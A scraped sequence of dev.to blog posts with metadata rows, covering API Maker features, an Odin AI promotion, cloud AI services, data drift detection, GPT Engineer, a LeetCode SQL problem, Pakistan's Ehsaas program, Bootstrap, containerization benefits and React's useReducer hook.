Harness the power of technology, wield the language of programming, and be the architect of innovation. Together, we can push the boundaries of what's possible and create a future where anything is achievable. Happy coding! 🎉💪
Now, go forth and conquer the world of programming! 🌟🌈 May your code be bug-free, your algorithms be efficient, and your passion for programming never fade. The world eagerly awaits the wonders you'll create! 🌎✨⚡️
Happy Coding 👨💻

| mursalfk |
1,511,355 | Excited to start my Coding Journey! | A post by Jesse Navarette | 0 | 2023-06-21T00:44:09 | https://dev.to/jesse_navarette_b4e40b75b/excited-to-start-my-coding-journey-1lh2 | jesse_navarette_b4e40b75b | ||
1,511,716 | 🚀 API Maker - Git Integration | 👉 Developer accounts ⭐ List of Feature ⭐ ✅ N-number of developer accounts ▸ API Maker... | 0 | 2023-10-20T04:06:52 | https://dev.to/apimaker/api-maker-git-integration-222p | javascript, webdev | ## 👉 Developer accounts
⭐ List of Features ⭐
✅ N-number of developer accounts
▸ The API Maker admin can create multiple developer accounts, without any limit.
▸ Enables multiple developers to collaborate on a common project with their own accounts.
▸ Each developer account has login credentials with a different API path to access APIs.
▸ API Maker allows developers to connect with Git and pull/push their changes.
▸ Every developer has their own secrets, which are never pushed to Git.
▸ Developers can be updated and deleted by the API Maker admin.
▸ No duplicates are allowed for developer emails and api_paths; they must be unique.
----------------------------------
## 👉 Git integration
⭐ List of Features ⭐
✅ Git integration
▸ To integrate with Git, the user only needs to enter the correct Git credentials into the URL on the 'User Info' page.
▸ After that, the user can access Git pull/push functionality from within API Maker itself.
✅ Git branch
▸ Get the list of branches available on Git.
▸ Create a new branch from an existing one.
▸ Make a branch the default with a single selection.
✅ Git Pull/Push & Status
▸ Users can check the current status of any listed branch.
▸ Status displays the files that differ between your updated code and the currently selected branch.
▸ Users can compare the code of each updated file.
▸ The differences between them are shown in the highlighted parts.
▸ Users can revert a change by just clicking the 'Revert Change' button.
▸ To push changes, the user just writes a commit message and clicks the 'Commit' button.
▸ Make sure you have pushed your changes to your branch before clicking the 'Pull' button, as pulling will overwrite your changes with the code from the currently selected branch.
Note: Secrets and Notes are not committed on Git push operations.
----------------------------------
## 👉 Database name masking
⭐ List of Features ⭐
✅ Masking DBs for multiple developers
▸ Masking is needed to keep the database name consistent with the production database name when multiple developers work on a single project.
✅ Manage Git push/pull
▸ Masking eliminates the need for users to change the database name before each Git push.
----------------------------------
## YouTube video link
https://youtu.be/Toq_34dC4Cw
## Websites
https://apimaker.dev
## API Docs link
https://docs.apimaker.dev/v1/docs/Git/git.html
## Follow on twitter
https://twitter.com/api_maker
## Linked In
https://www.linkedin.com/company/api-maker | apimaker |
1,511,798 | How Odin AI Helps Employees To Boost Productivity and Time Efficiency | Odin AI | In today’s fast-paced working environment, employees are constantly looking for ways to improve their... | 0 | 2023-06-21T11:02:24 | https://dev.to/getodinai/how-odin-ai-helps-employees-to-boost-productivity-and-time-efficiency-odin-ai-17hf | workplace, programming, promptengineering, ai | In today’s fast-paced working environment, employees are constantly looking for ways to improve their productivity and time efficiency. With Odin AI, an advanced conversational AI tool, achieving these goals has become easier than ever before. In this article, we will discuss the 7 ways in which Odin AI gets the job done.
## Coding Assistance For Developers With Odin AI
Developers spend immense amounts of time creating and testing code. Odin AI can provide programming guidance to developers and help them optimize their code. Odin AI can analyze code, detect and correct errors, and offer suggestions to improve performance.
**Prompt Example :** _“As a developer, write a simple Accordion with HTML and CSS3”_

## Summarizing Documents With Odin AI
Reading and analyzing lengthy documents can be both time-consuming and extremely challenging. With Odin AI, employees no longer have to go through the laborious task of sifting through multiple pages of text. First things first, Odin AI offers an editable knowledge base. That means employees can upload unlimited data to Odin AI to get customized responses. Odin AI is one of those few efficient, conversational AI tools that allows users to [chat with PDF](https://blog.getodin.ai/how-to-use-odin-and-the-knowledge-base-to-summarize-a-pdf/). Upload any PDF, web link, or website; Odin AI will crawl them and give the desired output on almost everything. The best part: it reads tables and even creates tabular information.
**Prompt Example:** _“summarize this article. Here’s the [link]”_

## Create Marketing Materials With Odin AI
[Marketing](https://blog.getodin.ai/using-ai-prompts-to-enhance-your-creative-writing-with-odin/) is a critical aspect of many businesses, and creating engaging content is essential to drive sales. Odin AI can help employees create marketing materials effortlessly. By analyzing a company’s branding guidelines, core messaging, and target audience, Odin AI can suggest appropriate approaches and messaging ideas and even generate content, reducing the workload of employees.
**Prompt Example :** _“Suggest some inexpensive ways I can promote my collection of hand-painted cool t-shirts for men in New York City. The brand name is — ZAIKU”_

## Creating Fresh Content Materials With Odin AI
Generating fresh content is a challenge for many businesses. Odin AI can help employees with this task by suggesting relevant topics and keywords and even generating unique content pieces. This feature not only helps employees generate more content but also helps ensure that the content is current and relevant. Write blogs, articles, [scripts](https://blog.getodin.ai/how-to-create-awesome-social-media-video-scripts-with-odin-ai/), essays, poems, outlines, cover letters, and more.
**Prompt Example :**_“Write a how-to guide on creating a budget-friendly home gym. Keep the tone creative and engaging. Write in 200–250 words.”_

## Brainstorm Ideas With Odin AI
When it comes to generating ideas for daily tasks, Odin AI is a useful resource for staff. Odin AI operates as a creative partner, encouraging original thinking and igniting new ideas with its extensive knowledge and analytical skills. It can bring significant insights, alternative approaches, and [fresh perspectives](https://blog.getodin.ai/finding-your-voice-a-simple-guide-to-use-odin-ais-personality-feature/) on a variety of problems.
**Prompt Example :** _“I’m stuck at a blog on “how to use Odin AI to boost time efficiency for employees”_

## Get Entertained With Odin AI
Odin AI can provide a source of entertainment for employees seeking a brief respite from their demanding tasks. It can engage in casual conversations, share jokes, offer interesting trivia, and even generate creative content like stories or poems. By offering a lighthearted diversion, Odin AI can help employees momentarily unwind and recharge, allowing them to return to their work with a refreshed mindset.
**Prompt Example:** _“Let’s play a word association game. I’ll start with a word:”_

## Drafting Emails With Odin AI
Writing clear and concise emails can be a task in itself. Odin AI can come in handy to reduce the time and effort required to compose the perfect email. It can provide templates and suggestions based on the context of the email, making it easier for employees to quickly draft professional emails.
**Prompt Example :** _“Write an email to your supervisor requesting time off for a family event next month. Be sure to include the date of the event, the reason for the request, and any necessary details about how your work will be covered during your absence.”_

## Conclusion
Odin AI can provide businesses with a cost-effective way to increase employee productivity and efficiency. The conversational AI can help employees with a variety of tasks, including content creation, research, and data management. By allowing Odin AI to handle the more repetitive and tedious tasks, employees can focus on the more important aspects of their work, leading to a more productive work environment and better results. | getodinai |
1,512,380 | AI: how to include AI in software projects | Artificial intelligence is now within everyone's reach. You don't need to be an expert in data... | 0 | 2023-06-21T20:12:37 | https://dev.to/eleonorarocchi/ai-how-to-include-ai-in-software-projects-2ep0 | ai, azure, aws, googlecloud | Artificial intelligence is now within everyone's reach. You don't need to be an expert in data analytics or machine learning to exploit its potential in software projects.
## In which areas to use AI in my software projects
- Speech Recognition to convert audio into text and to transcribe conversations or voice commands.
- Artificial vision for image analysis: classify objects, detect faces, and read text in images (going beyond plain OCR!).
- Natural language analysis and understanding, automatic translation into other languages, sentiment analysis, and keyword extraction (see the sketch after this list).
- Improved information search with Cognitive Search, for greater efficiency and accuracy.
- Creation and management of interactive knowledge bases and intelligent chatbots that can answer user questions and offer automated assistance.
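As a minimal sketch of what calling one of these services looks like in code, here is a sentiment-analysis request against Amazon Comprehend using `boto3`. It assumes AWS credentials and a region are already configured in your environment, and the sample sentence is made up.
```python
import boto3

# Assumes AWS credentials/region are configured (e.g., via environment variables).
comprehend = boto3.client("comprehend")

text = "Integrating this service into our project was surprisingly painless!"

# Detect the overall sentiment of the text (English in this example).
result = comprehend.detect_sentiment(Text=text, LanguageCode="en")

print(result["Sentiment"])       # e.g., POSITIVE
print(result["SentimentScore"])  # per-class confidence scores
```
The other providers expose equivalent calls through their own SDKs (Azure Cognitive Services and Google Cloud Natural Language), so the integration effort is similar whichever cloud you pick.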
## Which products can I use to include AI in my projects
- Speech Recognition: Amazon Polly, Microsoft Azure Cognitive Services, Google Cloud Speech-to-Text
- Artificial vision: Amazon Rekognition, Microsoft Azure Cognitive Services, Google Cloud Vision
- Knowledge: Amazon Lex, Microsoft Azure Cognitive Services, Google Dialogflow
- Natural language analysis: Amazon Comprehend, Amazon Translate, Microsoft Azure Cognitive Services, Google Cloud Natural Language, Google Cloud Translation
| eleonorarocchi |
1,512,416 | Data Drift: Understanding and Detecting Changes in Data Distribution | What is Data Drift? Data drift refers to the distributional change between the data used... | 0 | 2023-06-21T20:21:38 | https://dev.to/elldora/data-drift-understanding-and-detecting-changes-in-data-distribution-ne | machinelearning, datadrift, distribution, largedataset | ## What is Data Drift?
`Data drift` refers to the `distributional change` between the data used to train a model and the data being sent to the deployed model. One of the important approaches in machine learning modeling is **probabilistic modeling**.
> _From a **Probabilistic Machine Learning** perspective, we can assume that the features in a dataset are drawn from a hypothetical distribution._
However, in real-world modeling, it becomes evident that _data does not remain constant over time_. It is influenced by various factors such as `seasonality changes`, `missing values`, `technical issues`, and `time fluctuations`. This means that a dataset collected for machine learning modeling may not be the same at all times.
**Regular monitoring of model performance** allows us to catch instances of data drift. It is crucial to monitor the **change in data distribution** between the training data and the live data from time to time.
In most cases, the occurrence of data drift shows that our trained model is becoming outdated and should be retrained or updated with the newest data. Here, "live data" refers to the data that is being sent to the deployed model.
## Top 5 Data Drift Techniques
Because I needed to evaluate a deployed model, I had to monitor its results on unseen data. But it was a real quest to understand how to measure the model's performance, and it was also not clear how I could measure the data's behavior!
**[EvidentlyAI](https://www.evidentlyai.com/)** is one of the websites whose articles I check regularly. In [this article](https://www.evidentlyai.com/blog/data-drift-detection-large-datasets), it introduces the `data drift` concept and the `top 5 techniques` to detect it on the features of a large dataset, and it provides a simple example as well.
These techniques are:
- **[Kolmogorov-Smirnov (KS)](https://en.wikipedia.org/wiki/Kolmogorov%E2%80%93Smirnov_test)** technique, which is more suitable for numerical features. It is a non-parametric test. When we use this test, we want to accept or reject the hypothesis that two samples are drawn from the same distribution.
- **[Population stability index (PSI)](https://mwburke.github.io/data%20science/2018/04/29/population-stability-index.html)**, used to measure the shift between two different datasets. It is suitable for both numerical and categorical data. The larger this metric, the more different the distributions of the two datasets are.
- **[Kullback-Leibler divergence (KL)](https://en.wikipedia.org/wiki/Kullback%E2%80%93Leibler_divergence)** is a metric that measures the difference between two distributions. It can be applied to numerical and categorical datasets. Its range is from 0 to infinity; the smaller the KL value, the more similar the two distributions are.
- **[Jensen-Shannon divergence](https://en.wikipedia.org/wiki/Jensen%E2%80%93Shannon_divergence)** is defined based on the KL divergence. The difference is that its value lies between 0 and 1.
- **[Wasserstein distance](https://en.wikipedia.org/wiki/Earth_mover%27s_distance)** is a measure for monitoring numerical data drift. Intuitively, it quantifies the minimum "work" needed to transform one distribution into the other, which is why it is also known as the earth mover's distance.
The article also provides a practical example that I could apply to my own data to understand it well; a minimal sketch in the same spirit follows.
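To make the first technique concrete, here is a small self-contained sketch of a KS-based drift check on one numerical feature, comparing a reference (training) sample against a current (live) sample. The simulated data and the 0.05 significance threshold are illustrative assumptions.
```python
import numpy as np
from scipy.stats import ks_2samp

rng = np.random.default_rng(42)

# Reference (training) data vs. current (live) data for one numerical feature.
reference = rng.normal(loc=0.0, scale=1.0, size=1_000)
current = rng.normal(loc=0.5, scale=1.0, size=1_000)  # shifted mean simulates drift

# Two-sample KS test: can we reject that both samples share one distribution?
statistic, p_value = ks_2samp(reference, current)

if p_value < 0.05:  # illustrative threshold
    print(f"Drift detected (KS statistic={statistic:.3f}, p={p_value:.4f})")
else:
    print(f"No drift detected (KS statistic={statistic:.3f}, p={p_value:.4f})")
```
In a monitoring job, you would run a check like this per feature on a schedule and alert (or trigger retraining) when drift is flagged.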
## More Resources:
As I work with the Azure Machine Learning platform, I am very interested in unlocking its features.
First of all, I found a [mini course](https://learn.microsoft.com/en-us/training/modules/monitor-data-drift-with-azure-machine-learning/) about data drift which you can easily get through to understand the main concepts in this field.
Then, I really suggest having a look at this [article](https://towardsdatascience.com/getting-a-grip-on-data-and-model-drift-with-azure-machine-learning-ebd240176b8b), which clearly describes data and model drift and applies the concepts using Azure Machine Learning's data drift capabilities.
Finally, I found a [git repository](https://github.com/Azure/data-model-drift/tree/main) that tries to monitor data drift using Azure ML and integrate it with a Power BI dashboard.
I am interested in learning more about this topic. If you know other useful resources, please leave a note about them :) | elldora |
1,512,470 | GPT Engineer: A Generative Pre-trained Transformer for Software Engineering | GPT Engineer: A Generative Pre-trained Transformer for Software Engineering GPT Engineer is a... | 0 | 2023-06-21T21:23:23 | https://dev.to/stackfoss/gpt-engineer-a-generative-pre-trained-transformer-for-software-engineering-17o | opensource, news, stackfoss, chatgpt | ---
title: GPT Engineer: A Generative Pre-trained Transformer for Software Engineering
published: true
date: 2023-06-14 14:18:09 UTC
tags: opensource, news, Stackfoss, Chatgpt
canonical_url:
---
**GPT Engineer: A Generative Pre-trained Transformer for Software Engineering**
GPT Engineer is a generative pre-trained transformer that can be used to generate code, documentation, and other software artifacts. It is trained on a massive dataset of code, natural language, and other software-related data. GPT Engineer can be used to:
- Generate code from natural language descriptions
- Generate documentation from code
- Generate test cases for code
- Generate bug fixes for code
- Generate new features for code
- Generate entire software systems from scratch
GPT Engineer is still under development, but it has already been used to generate a variety of software artifacts, including:
- A web application that can be used to generate code from natural language descriptions
- A documentation generator that can generate documentation from code
- A test case generator that can generate test cases for code
- A bug fixer that can generate bug fixes for code
- A feature generator that can generate new features for code
- An entire software system from scratch
GPT Engineer is a powerful tool that can be used to automate many of the tasks involved in software development. It is still under development, but it has the potential to revolutionize the way software is developed.
**How does GPT Engineer work?**
GPT Engineer is a generative pre-trained transformer. This means that it is trained on a massive dataset of code, natural language, and other software-related data. This data is used to train the transformer model to learn the relationships between different words, phrases, and concepts.
When GPT Engineer is given a prompt, it uses its knowledge of these relationships to generate text that is relevant to the prompt. For example, if you give GPT Engineer the prompt "Write a function that takes two numbers as input and returns their sum", it will generate the following code:
```python
def sum(a, b):
"""Returns the sum of two numbers."""
return a + b
```
GPT Engineer can also be used to generate other types of software artifacts, such as documentation, test cases, and bug fixes.
**How to use GPT Engineer**
GPT Engineer is available as a free open-source project on GitHub. To use GPT Engineer, you will need to install it on your computer. You can then use it to generate code, documentation, and other software artifacts.
**Benefits of using GPT Engineer**
GPT Engineer offers a number of benefits, including:
- Increased productivity: GPT Engineer can automate many of the tasks involved in software development, which can free up developers to focus on more creative and strategic work.
- Improved quality: GPT Engineer can generate code that is more consistent, readable, and maintainable than code that is written by humans.
- Reduced costs: GPT Engineer can help to reduce the cost of software development by eliminating the need to hire additional developers.
**Drawbacks of using GPT Engineer**
GPT Engineer also has some drawbacks, including:
- Limited capabilities: GPT Engineer is still under development, and it cannot currently generate all types of software artifacts.
- Potential for errors: GPT Engineer is a machine learning model, and it can make mistakes. It is important to carefully review any code or other artifacts that are generated by GPT Engineer.
---
Author:
[StackFoss](https://www.stackfoss.com) | stackfoss |
1,512,966 | Patients With a Condition | LeetCode | MSSQL | The Problem We're given a table called Patients: Column... | 20,410 | 2023-06-28T17:29:00 | https://dev.to/ranggakd/patients-with-a-condition-leetcode-mssql-4lnc | beginners, programming, leetcode, mssql | ## The Problem
We're given a table called `Patients`:
| Column Name | Type |
|--------------|---------|
| patient_id | int |
| patient_name | varchar |
| conditions | varchar |
The `patient_id` is the primary key for this table. The `conditions` field contains zero or more condition codes separated by spaces. The task is to write an SQL query that identifies patients who have Type I Diabetes, which is always indicated by a code starting with the prefix "DIAB1". The result should include the `patient_id`, `patient_name`, and `conditions` of such patients and can be returned in any order.
For instance, given the following input:
| patient_id | patient_name | conditions |
|------------|--------------|--------------|
| 1 | Daniel | YFEV COUGH |
| 2 | Alice | |
| 3 | Bob | DIAB100 MYOP |
| 4 | George | ACNE DIAB100 |
| 5 | Alain | DIAB201 |
The expected output is:
| patient_id | patient_name | conditions |
|------------|--------------|--------------|
| 3 | Bob | DIAB100 MYOP |
| 4 | George | ACNE DIAB100 |
Explanation: Bob and George both have a condition that starts with DIAB1.
## The Solution
We've derived four different solutions for this problem. All four solutions use variations of SQL's pattern matching capabilities to identify the necessary records, but each one approaches it differently, leveraging different SQL functions and strategies.
### Source Code 1
This query utilizes the `LIKE` operator to search for the substring "DIAB1" in the `conditions` column. It's checking for two scenarios: `conditions` starting with "DIAB1" or "DIAB1" appearing after a space (indicating it is the start of a new condition).
```sql
SELECT *
FROM Patients
WHERE conditions LIKE 'DIAB1%'
OR conditions LIKE '% DIAB1%'
```
This query has a runtime of 677ms, beating 20.93% of submissions.

### Source Code 2
This solution employs the `PATINDEX` function to find the starting position of the "DIAB1" substring in the `conditions` column. It checks the same scenarios as the first solution.
```sql
SELECT *
FROM Patients
WHERE PATINDEX('DIAB1%', conditions) != 0
OR PATINDEX('% DIAB1%', conditions) != 0
```
This solution has a runtime of 799ms, beating 11.24% of submissions.

### Source Code 3
This code is identical to Source Code 2, but it specifically selects the `patient_id`, `patient_name`, and `conditions` columns to return, instead of using `SELECT *`. This can improve performance, especially if the original table has many columns.
```sql
SELECT
patient_id,
patient_name,
conditions
FROM Patients
WHERE PATINDEX('DIAB1%', conditions) != 0
OR PATINDEX('% DIAB1%', conditions) != 0
```
This query has a runtime of 591ms, beating 35.53% of submissions.

### Source Code 4
Source Code 4 is identical to Source Code 3, so it should provide the same results. Variance in runtime is likely due to fluctuations in server load or database state rather than differences in the queries themselves.
```sql
SELECT
patient_id,
patient_name,
conditions
FROM Patients
WHERE PATINDEX('DIAB1%', conditions) != 0
OR PATINDEX('% DIAB1%', conditions) != 0
```
This query has a runtime of 635ms, beating 26.87% of submissions.

## Conclusion
Based on the performance of these solutions in LeetCode, the most efficient solution would be Source Code 3, followed by Source Code 4, Source Code 1, and finally Source Code 2. However, keep in mind that the efficiency of SQL operations can significantly differ based on the specifics of the database, including its size, structure, indexing, and the database management system itself.
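As a side note, MSSQL also lets you collapse the two patterns into a single condition by prepending a space to the column, so the start-of-string case and the mid-string case become the same pattern. This variant is a sketch and was not benchmarked on LeetCode:
```sql
SELECT patient_id, patient_name, conditions
FROM Patients
-- Prepending ' ' means every condition code, including the first,
-- is preceded by a space, so one pattern covers both cases
WHERE ' ' + conditions LIKE '% DIAB1%'
```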
You can find the original problem at [LeetCode](https://leetcode.com/problems/patients-with-a-condition/description/).
For more insightful solutions and tech-related content, feel free to connect with me on my [Beacons page](https://beacons.ai/ranggakd).
{% embed https://beacons.ai/ranggakd %} | ranggakd |
1,513,090 | Title: Ehsaas Program: Nurturing Empathy and Social Welfare | Introduction: In a world where poverty and inequality persist as pressing challenges, the Ehsaas... | 0 | 2023-06-22T11:42:35 | https://dev.to/cnfgh547567/title-ehsaas-program-nurturing-empathy-and-social-welfare-4mgi |
Introduction:
In a world where poverty and inequality persist as pressing challenges, the Ehsaas program emerges as a beacon of hope and compassion. Developed with the aim of alleviating poverty and fostering social welfare, Ehsaas stands as a unique initiative that embraces the values of empathy, inclusivity, and human dignity. Let's dive into the intricacies of this remarkable program and explore how it is transforming lives for the better.
A Holistic Approach to Tackling Poverty:
The Ehsaas program, initiated by the Government of Pakistan, presents a holistic framework designed to address the multifaceted nature of poverty. It recognizes that poverty is not solely about lacking financial resources, but also encompasses factors such as health, education, housing, and social protection. By adopting a comprehensive approach, Ehsaas aims to create a society where no individual is left behind. [8171](https://bisp8171.com)
Empowering Through Social Safety Nets:
One of the fundamental pillars of the Ehsaas program is the establishment of robust social safety nets. These nets serve as a means to uplift marginalized communities and vulnerable individuals by providing them with financial assistance, healthcare, and educational opportunities. By offering cash transfers, interest-free loans, and scholarships, Ehsaas aims to empower individuals and families, enabling them to break free from the cycle of poverty and pursue a better future.
Addressing Inequality and Gender Disparities:
Ehsaas recognizes the significance of addressing inequalities that plague societies, particularly those rooted in gender disparities. The program strives to create an enabling environment where women can actively participate in the workforce, receive equal opportunities, and access resources that empower them. Through initiatives such as the [Ehsaas program](https://bisp8171.com/%D8%A7%D8%AD%D8%B3%D8%A7%D8%B3-%D9%BE%D8%B1%D9%88%DA%AF%D8%B1%D8%A7%D9%85-8171/), which provides financial assistance to widows, orphans, and deserving women, Ehsaas promotes gender equality and social justice.
Digital Solutions for Transparent Governance:
Embracing the power of technology, the Ehsaas program leverages digital solutions to ensure transparency, efficiency, and accountability. Through the Ehsaas Digital Center platform, individuals can access a range of services, including biometric verification, financial assistance applications, and information dissemination. By adopting a digital approach, Ehsaas eliminates middlemen and corrupt practices, ensuring that the benefits reach the intended beneficiaries.
Partnerships for Collective Impact:
Recognizing that tackling poverty requires collective effort, the Ehsaas program actively encourages partnerships between the government, civil society organizations, and private enterprises. By collaborating with various stakeholders, Ehsaas expands its reach, strengthens its impact, and promotes sustainable development. These partnerships foster innovative solutions, enhance service delivery, and bring about transformative change at both the individual and community levels.
Conclusion:
The Ehsaas program shines as a testament to the power of empathy and social welfare in transforming lives. By addressing poverty through a comprehensive approach, empowering individuals, bridging gender gaps, leveraging technology, and fostering partnerships, Ehsaas paves the way for a more inclusive and equitable society. It reminds us of our collective responsibility to uplift those in need, embrace compassion, and work towards a future where everyone has the opportunity to thrive. Through Ehsaas, Pakistan stands at the forefront of humanitarian efforts, inspiring the world with its dedication to creating a better tomorrow for all.
| cnfgh547567 | |
1,513,098 | 🚀 API Maker - Auto Increment | ⭐ List of Feature ⭐ ✅ Inbuilt increment ▸ Some databases, such as MongoDB, do not support... | 0 | 2023-10-25T03:24:26 | https://dev.to/apimaker/api-maker-auto-increment-c9h |
⭐ List of Features ⭐
✅ Inbuilt increment
▸ Some databases, such as MongoDB, do not support auto-incrementing fields. API Maker can provide this functionality for those databases by automatically generating sequential values for each record.
✅ isAutoIncrementByAM
▸ To enable this feature, the user only has to set the isAutoIncrementByAM property to true.
✅ start & step
▸ The user can also specify the initial value and the increment amount for each record (see the schema sketch after this list).
✅ CRUD operation
▸ The user can perform CRUD operations on the auto-incremented records.
✅ Easy Backup & Restore in New Environment
▸ The user can easily back up and restore the auto-increment list when creating or deleting a server.
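To illustrate, a hypothetical schema field using these properties might look like the sketch below. The property names `isAutoIncrementByAM`, `start`, and `step` come from the feature list above, but the surrounding structure is an assumption; see the API docs link below for the exact format.
```js
// Hypothetical field definition for a MongoDB collection schema in API Maker
{
  orderNo: {
    type: "number",
    isAutoIncrementByAM: true, // let API Maker generate sequential values
    start: 1000,               // assumed: first generated value
    step: 5                    // assumed: increment between records
  }
}
```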
----------------------------------
## Youtube video link
https://youtu.be/sfeOhhg3Kjw
## Websites
https://apimaker.dev
## API Docs link
https://docs.apimaker.dev/v1/docs/features/auto-increment.html#autoincrement-list
## Follow on twitter
https://twitter.com/api_maker
## Linked In
https://www.linkedin.com/company/api-maker | apimaker | |
1,513,161 | Bootstrap! | Ah so yes, I finally gained extra progress in this whole journey. I started the section of Bootstrap... | 0 | 2023-06-22T12:51:23 | https://dev.to/doyinaluko/bootstrap-1a70 | bootstrap, css, html, developer | Ah so yes, I finally gained extra progress in this whole journey. I started the section of Bootstrap properly some days back after spending so much time understanding how to use Bootstrap! I honestly can`t believe it took me close to two months to find my way into Bootstrap. I hope the developers out there will forgive me for taking so long to understand the starting point of this framework called Bootstrap. I need folks to understand what Bootstrap is because I have neutrals following this blog.
A very basic way of explaining Bootstrap, without going into too much detail, is a driving analogy. Just imagine going to driving school and taking your lessons in a manual vehicle, and then being gifted an automatic vehicle after mastering the manual car. This may not be the most ideal explanation for Bootstrap, but it comes close. Bootstrap is essentially a framework that automates quite a lot of things you would otherwise do with plain CSS.
The only twist is that when you need your page to behave in a certain manner, you may still have to write your own stylesheet and style the page manually. In practice, the local stylesheet overrides the Bootstrap framework. Bootstrap makes your work easy, but it is there to work alongside your local stylesheet and help you write code faster.
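To make that concrete, here is a minimal sketch of the idea. The Bootstrap CDN link and the `.btn-primary` class are real Bootstrap pieces; the green override is just a made-up example:
```html
<head>
  <!-- Bootstrap loads first... -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
  <!-- ...then the local stylesheet, so rules of equal specificity here win -->
  <style>
    .btn-primary {
      background-color: darkgreen; /* overrides Bootstrap's default blue */
      border-color: darkgreen;
    }
  </style>
</head>
<body>
  <button class="btn btn-primary">Send</button>
</body>
```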
I was overwhelmed at some point while working on this Bootstrap project because I was new to it at the time. I am taking time right now to unwind from the mental stress of setting up the page that I am going to share at the end of this post. I was able to build a responsive page using Bootstrap. Please feel free to try out the page, and fill in the contact address on the landing page.
This is the progress so far in this tech journey. Now I can return to my course.
[The Bootstrap project link](https://doyinaluko.github.io/turningnorth/) | doyinaluko |
1,513,271 | 5 Reasons Why You Should Containerize | Containerization has turned into a de facto practice of software development. But some businesses are... | 0 | 2023-06-22T14:31:31 | https://blog.dyrector.io/2023-06-21-why-containerize/ | containers, docker, kubernetes, podman | **Containerization has turned into a de facto practice of software development. But some businesses are still hesitant to jump on the hype train. Learn about the 5 reasons why organizations containerize, and how the practice improves the development of applications on any scale.**
---
## #1: Containers Are Simple for Developers
More often than not, all it takes for an engineer is a `docker compose up` to start a containerized stack. Consistency and reusability represented by **[containerization done right](https://blog.dyrector.io/2023-06-15-containerization-best-practices/)** is useful for software developers as it saves a lot of time they would need to go through manual steps without containers. A container can be sparked up on a development and a production environment with ease and the errors will be the same, which aligns with the **[shift-left](https://blog.dyrector.io/2022-02-01-left-vs-right/)** testing focus that some DevOps teams prefer.
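For illustration, a minimal `docker-compose.yml` for such a stack might look like this; the images and ports are placeholders:
```yaml
# Hypothetical two-service stack: one `docker compose up` starts both
services:
  web:
    image: nginx:alpine
    ports:
      - "8080:80"   # host:container
  db:
    image: postgres:15
    environment:
      POSTGRES_PASSWORD: example
```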
## #2: Throwaway Containers for Experimentation
You can check your containers’ functionality out temporarily with `docker run --rm -it debian:12 /bin/bash`. Here’s how it works:
- **run:** Starts a container from any particular image. It’s relevant as OCI standards dictate that containers need to be able to run without any parameters.
- **--rm:** Deletes container after the process is exited.
- **-it:** Starts an interactive container instance in Docker: `i` stands for interactive, `t` allocates a pseudo-TTY.
- **debian:12:** Interchangeable example image name and tag, can be any image.
- **/bin/bash:** You need a shell that can be run inside the container. For this particular use bash is sufficient.
You can use this command like a cheat code when you’re prototyping, exploring containers or creating a Dockerfile in parallel.
## #3: Effective Distribution
OCI standards provide a general solution to the problem of artifact distribution. Content-addressed image layers make room for diverse usage of a container, as you're now able to store and transfer any data using images. On top of that, multi-architecture use is now possible by adding new layers to a container, which is in demand since Apple's M1 and M2 chips turned the world upside down.
Image layers come in handy when some elements of your containerized application change frequently but the rest remains the same, like a frontend that changes regularly compared to the backend that belongs to it.
## #4: Security
The general rule of thumb when it comes to container security is to isolate build and runtime dependencies to minimize the attack surface. Another important thing to keep in mind is the SBOM, which stands for "software bill of materials". Think of it as a de facto list of ingredients required to build an image; with its help you can discover vulnerabilities more easily. It helps companies and individuals do risk management more efficiently, and you can generate one simply with `docker sbom`, which is supported for experimental use in Docker Engine 24.0.
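For example, assuming the sbom plugin is available in your Docker installation, inspecting an image looks roughly like this (flag names per the plugin's help at the time of writing):
```bash
# Print the software bill of materials for an image
docker sbom nginx:latest

# Emit SPDX JSON so other tooling can consume it
docker sbom --format spdx-json --output sbom.json nginx:latest
```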
## #5: Minimal Performance Overhead
Ease of use comes with a mild trade-off compared to natively run apps. **[Benchmark data](https://stackoverflow.com/questions/21889053/what-is-the-runtime-performance-cost-of-a-docker-container)** shows that a containerized application's performance characteristics resemble those of native software. Since containerization is a feature of Linux kernel process management, it's the ideal way to run containerized applications in Linux environments. On any other OS, Docker runs containers in a virtualized environment rather than the native manner offered by Linux.
## Time Is Money
Containerization has its limitations, but it is the approach that makes the most sense for running successful applications, as it eliminates repetitive maintenance steps. According to Gartner's latest research, more than 90% of global organizations will use containerized software in production by 2027, as containerization has become an accessible, multipurpose technology for data and software delivery.
### Docker vs. Podman
The obvious question at this point is whether you should go with **[Docker or Podman](https://www.imaginarycloud.com/blog/podman-vs-docker/)**. Considering the big picture, these are interchangeable, but if extra security sounds good to you in exchange for a bit of extra complexity, we suggest Podman. If you want to get started with containerization, take a look at **[Awesome Docker](https://github.com/veggiemonk/awesome-docker)**.
---
_This blogpost was written by the team of [dyrector.io](https://dyrectorio.com). dyrector.io is an open-source container management platform._
**Find the project on [GitHub](https://github.com/dyrector-io/dyrectorio/).** | gerimate |
1,513,661 | A Beginner's Guide to the useReducer Hook in React.js | React.js is a popular JavaScript library for building user interfaces, and it provides several hooks... | 0 | 2023-06-22T19:14:16 | https://dev.to/gaurbprajapati/a-beginners-guide-to-the-usereducer-hook-in-reactjs-5cp6 | webdev, javascript, react, frontend |
React.js is a popular JavaScript library for building user interfaces, and it provides several hooks that simplify state management. One of the most powerful hooks is `useReducer`, which offers a predictable way to manage complex state logic within a React component. In this tutorial, we will explore the code example provided and explain each concept in detail to help beginner developers understand the `useReducer` hook.
Let's dive into the code example provided and explain each concept step by step.
1. usereducer.js:
```jsx
import { useReducer } from "react";
import React from "react";
const initialState = 0;
export default function Usereducer() {
function reducer(state, action) {
switch (action.type) {
case "increment":
return state + 1;
case "decrement":
return state - 1;
case "division":
return state / 2;
case "multiply":
return state * 2;
default:
throw new Error();
}
}
const [state, dispatch] = useReducer(reducer, initialState);
return (
<div>
Hello Count: {state}
<button onClick={() => dispatch({ type: "increment" })}>+</button>
<button onClick={() => dispatch({ type: "decrement" })}>-</button>
<button onClick={() => dispatch({ type: "division" })}> /</button>
<button onClick={() => dispatch({ type: "multiply" })}>*</button>
</div>
);
}
```
Explanation:
- Importing `useReducer` from the "react" module allows us to use the `useReducer` hook in our component.
- `initialState` represents the initial value of the state, which in this case is set to 0.
- The `Usereducer` function component is exported as the default export.
- Inside the `Usereducer` component, we define the `reducer` function. This function takes the current state and an action as parameters.
- The `switch` statement inside the reducer function checks the `action.type` to determine which case to execute. Based on the action type, the reducer returns a new state.
